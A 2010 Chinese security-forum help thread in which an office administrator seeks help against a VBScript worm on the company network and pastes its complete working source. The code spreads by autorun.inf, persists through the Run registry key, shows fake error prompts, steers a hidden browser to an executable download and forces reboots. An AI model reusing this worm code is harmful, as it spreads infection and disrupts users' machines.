1   1  /  1  页   跳转

[求助] C:\windows\system32\msconfig.vbs 病毒

C:\windows\system32\msconfig.vbs 病毒

最近公司内网,大部份电脑都会弹出系统信息,如下图:(不定时弹出)点确定后,又后自动弹出此对话框,当点击“确定”多几次后,就会提示“系统出现问题,需要重启。请保存相关文件,并选择“确定”立即重启计算机。”如此反复。
(图


打开进程管理器,如图:


并且进程里会自动多一个“iexplor.exe


打开注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\CurrentVersion\Run”里面会多一个msconfig的项值。
(图




每次在注册表反这一项删除了,可是没过久,又或者下次重开电脑的时候,又会自动生成。
但搜索C:\Windows\System32\Msconfig.vbs此文件,又搜索不到,用SymantecClient Security在安全模式杀毒,没有发现病毒,用360卫士也同样处理不到。

由于公司电脑数较多,一时间不可以都把电脑重装系统,所以在这想请各位兄弟,高手,朋友帮忙。谢谢了。
最后编辑幽一狼 最后编辑于 2010-03-18 20:15:29
分享到:
gototop
 

回复: C:\windows\system32\msconfig.vbs 病毒



引用:
原帖由 辛达星郁 于 2010-3-18 20:35:00 发表
  很像“暴风一号”

自己参考一下这个帖子:http://bbs.ikaka.com/showtopic-8691015.aspx

还有问题就在跟帖说明





我有参考“暴风一号”的查杀方法,但都没起作用,很郁闷了。
以下是msconfig.vbs的代码,我是在Dos里提取的,看看你们有没有办法帮我解决这问题,谢谢了。
on error resume next
n1="scr":n2="I":n3="ptinG.fIl":n4=chr(101):n5="sySte":n6="m":n7="objEc":n8=chr(8
4)
Set a=CreateObject(n1 + n2 & n3 & n4 & n5 & n6 & n7 & n8):Set yy=CreateObject("w
script.shell")
Set kk=a.getfile(WScript.ScriptFullName)
if kk<> "C:\WINDOWS\system32\msconfig.vbs" then:yy.Run Mid(kk,1,2) & "\":end if
If a.FileExists("D:\111.txt") Then
else
If a.FileExists("D:\222.txt") Then
yy.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ms
config"
Set k=a.drives
For Each x In k
If x.DriveType=2 Then
Set aa=a.GetFile(x & "\autorun.inf"):aa.Attributes=0:Set bb=a.GetFile(x & "\Disk
Protect.vbs"):bb.Attributes=0
a.DeleteFile(x & "\autorun.inf"):a.deleteFile(x & "\DiskProtect.vbs")
End If
Next
Set ccc=a.GetFile("C:\WINDOWS\system32\msconfig.vbs"):ccc.Attributes=0:Set zzz=a
.GetFile("C:\WINDOWS\system32\regedit.exe"):zzz.Attributes=0
a.DeleteFile("C:\WINDOWS\system32\msconfig.vbs"):a.deleteFile("C:\WINDOWS\system
32\regedit.exe")
Else
Set c=a.GetFile(WScript.ScriptFullName)
if c<> "C:\WINDOWS\system32\msconfig.vbs" then
c.Attributes=6
Set b=a.Drives
For Each d In b
If d.DriveType=1 or d.DriveType=2 Then
If a.FileExists(d & "\DiskProtect.vbs") Then
else
a.CopyFile c,d & "\DiskProtect.vbs",TRUE
Set e=a.CreateTextFile(d & "\autorun.inf",2,true)
e.WriteLine "[autorun]":e.WriteLine "open=":e.WriteLine "shell\open=打开(&O)":e.
WriteLine "shell\open\Command=WScript.exe DiskProtect.vbs":e.WriteLine "shell\op
en\Default=1":e.WriteLine "shell\explore=资源管理器(&X)":e.WriteLine "shell\expl
ore\Command=WScript.exe DiskProtect.vbs"
e.close
set o=a.getfile(d & "\autorun.inf")
If Not o.Attributes And 1 Then:o.Attributes=o.Attributes Xor 1:End If:If Not o.A
ttributes And 2 Then:o.Attributes=o.Attributes Xor 2:End if:If Not o.Attributes
And 4 Then:o.Attributes=o.Attributes Xor 4:End If
End If
end if
next
If a.FileExists("C:\WINDOWS\system32\regedit.exe") Then
else
a.CopyFile c,"C:\WINDOWS\system32\msconfig.vbs",TRUE
set bab=a.createtextfile("C:\WINDOWS\system32\regedit.exe"):bab.write date:bab.c
lose
set aba=a.getfile("C:\WINDOWS\system32\regedit.exe"):If Not aba.Attributes And 1
Then:aba.Attributes=aba.Attributes Xor 1:End If:If Not aba.Attributes And 2 The
n:aba.Attributes=aba.Attributes Xor 2:End if:If Not aba.Attributes And 4 Then:ab
a.Attributes=aba.Attributes Xor 4:End If
Set oo=a.getFile("C:\WINDOWS\system32\msconfig.vbs"):oo.Attributes=6
end if
End If
end if
chk=yy.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
msconfig")
if chk="C:\WINDOWS\system32\msconfig.vbs" then
else
yy.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\msc
onfig", "C:\WINDOWS\system32\msconfig.vbs", "REG_SZ"
end if
Set objWMIService1 = GetObject("winmgmts:\\" & "." & "\root\cimv2")
Set colFileLista = objWMIService1.ExecQuery("ASSOCIATORS OF {Win32_Directory.Nam
e='C:\Program Files\Super Rabbit\MagicSet'} Where " & "ResultClass = CIM_DataFil
e")
For Each objFilea In colFileLista
If InStr(objFileb.FileName, "sriecli") Or InStr(objFileb.FileName, "iepro") Or I
nStr(objFileb.FileName, "gdiplus") Then:objFileb.Delete:End If
Next
Set colFileListb=objWMIService1.ExecQuery("ASSOCIATORS OF {Win32_Directory.Name=
'D:\Program Files\Super Rabbit\MagicSet'} Where " & "ResultClass = CIM_DataFile"
)
For Each objFileb In colFileListb
If InStr(objFileb.FileName, "sriecli") Or InStr(objFileb.FileName, "iepro") Or I
nStr(objFileb.FileName, "gdiplus") Then:objFileb.Delete:End If
Next
If a.FileExists("C:\McAfee\Rogue System Sensor\RSSensor.exe") Then
Wscript.Quit
else
set ded=a.opentextfile("C:\WINDOWS\system32\regedit.exe",1):ede=ded.readall:ded.
close
If Day(Date) Mod 2=0 and date-cdate(ede)>60 Then
WScript.Sleep rnd()*500000+50000
For i=1 To 5
Set ieA=CreateObject("InternetExplorer.Application")
ieA.Visible=false
Randomize
WScript.Sleep rnd()*130000+1000
If vbMsgBoxHelpButton=MsgBox("Windows发生错误-系统冲突,请下载更新补丁以修正此问
题。" & Chr(13) & Chr(13) & "请确定电脑己经联上网络,并按“是”自动下载此补丁程
序。", vbExclamation + vbMsgBoxHelpButton, "系统信息", "Help.hlp",1) Then
ieA.navigate "http://windowshelp.microsoft.com/Windows/zh-cn/default.mspx"
else
ieA.navigate "http://admincity.tom.com/skypetools/download/skype/0092/SkypeClien
t.exe"
End If
Next
strComputer=".":Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel
=impersonate,(Shutdown)}!\\" & strComputer & "\root\cimv2"):Set colOperatingSyst
ems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystems:if vbok=MsgBox("系统出现问题
,需要重启。请保存相关文件,并选择“确定”立即重启计算机。", vbCritical + vbOKCa
ncel, "系统提示") Then:ObjOperatingSystem.Reboot():else:yy.run "C:\WINDOWS\syste
m32\winhelp.hlp":end if:Next
End If
End If
End If
'/***简单事件***/
gototop
 

回复:C:\windows\system32\msconfig.vbs 病毒

公司没有用瑞星,用的是Symantec Client Security网络版的。
gototop
 

回复: C:\windows\system32\msconfig.vbs 病毒



引用:
原帖由 networkedition 于 2010-3-19 10:21:00 发表
装瑞星了嘛,使用瑞星的主动防御,应用程序控制,添加规则,监控c:\windows\system32 ,查看一下具体是哪个程序创建那个vbs。


此规则具体如何创建,能说详细些吗? 谢谢
gototop
 

回复: C:\windows\system32\msconfig.vbs 病毒



引用:
原帖由 天月来了 于 2010-3-19 10:23:00 发表
将C:\windows\system32\msconfig.vbs 文件压缩发来

然后用SRENG工具扫描系统日志发这论坛来

点击下载:SRENG工具  [/co



下面的是我提取到的脚本文件,但如何知道,这些脚本文件,是由那些应该程序产生的呢?

附件附件:

下载次数:329
文件类型:application/octet-stream
文件大小:
上传时间:2010-3-19 16:34:20
描述:rar

附件附件:

下载次数:250
文件类型:application/octet-stream
文件大小:
上传时间:2010-3-19 16:34:20
描述:rar

gototop
 

回复:C:\windows\system32\msconfig.vbs 病毒

好的,还真忘了扫描了。

谢谢哥们的热心帮助,我尽快把日志上传上来。
gototop
 

回复 16F 不可思议的我哦 的帖子

在Msconfig启动项里,早已把msconfig.vbs的勾去掉了,而且C:\windows\system32\msconfig.vbs 这个脚本文件也给删除了。但只要一打开,我的电脑磁盘(不管是右键-打开(0)、还是双击打开)在磁盘的分区根目录下,又会直接生成autorun.inf和DiskProtect.vbs两个隐藏文件。但是找C:\windows\system32\msconfig.vbs这个文件,"系统又提示找不到文件"。真郁闷,不知道是那个应用程序生成这些隐藏文件的呢?
gototop
 

回复: C:\windows\system32\msconfig.vbs 病毒



引用:
原帖由 networkedition 于 2010-3-19 10:21:00 发表
装瑞星了嘛,使用瑞星的主动防御,应用程序控制,添加规则,监控c:\windows\system32 ,查看一下具体是哪个程序创建那个vbs。


在Msconfig启动项里,早已把msconfig.vbs的勾去掉了,而且C:\windows\system32\msconfig.vbs 这个脚本文件也给删除了。但只要一打开,我的电脑磁盘(不管是右键-打开(0)、还是双击打开)在磁盘的分区根目录下,又会直接生成autorun.inf和DiskProtect.vbs两个隐藏文件。但是找C:\windows\system32\msconfig.vbs这个文件,"系统又提示找不到文件"。真郁闷,不知道是那个应用程序生成这些隐藏文件的呢?                                       

networkedition能告诉我,如何使用瑞星的主动防御,应用程序控制,添加规则,监控c:\windows\system32,查看一下具体是哪个程序创建那个vbs呢?

谢谢!

附件附件:

下载次数:264
文件类型:application/octet-stream
文件大小:
上传时间:2010-3-20 8:44:23
描述:rar

gototop
 

回复:C:\windows\system32\msconfig.vbs 病毒

兄弟们,我来了。
我按你们的方法,用SRE工具扫描,可是没有产生日志文件。而且也没有任何的异常。可是脚本病毒仍存在。
1、C:\windows\system32\msconfig.vbs
2、C:\autorun.inf
3、C:\diskprotect.vbs
4、D:\autorun.inf
5、D:\diskprotect.vbs
.................
这些脚本文件,到底是哪个应用程序产生的呢?而且我还发现,只要用右建--打开(0)或者是用资源管理器(X)打开磁盘分区,就会自动在每个分区的根目录产生autorun.inf、diskprotect.vbs两个文件。而且diskprotect.vbs的内容和C:\windows\system32\msconfig.vbs的内容是一模一样的。
      有没有朋友遇到这样的问题。谢谢
gototop
 

回复: C:\windows\system32\msconfig.vbs 病毒



引用:
原帖由 byxxdrls 于 2010-3-30 20:04:00 发表
C:\WINDOWS\system32\regedit.exe是个文件文件,里面的内容是日期。
我处理了这几个文件,没发现复发。


大哥,C:\WINDOWS\system32\regedit.exe是个文件文件,里面的内容是日期
    这什么意思?Regedit.exe 这个不是注册表来的吗? 打开里边怎么会是日期的内容呢?
请问你也遇到这种情况吗?
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT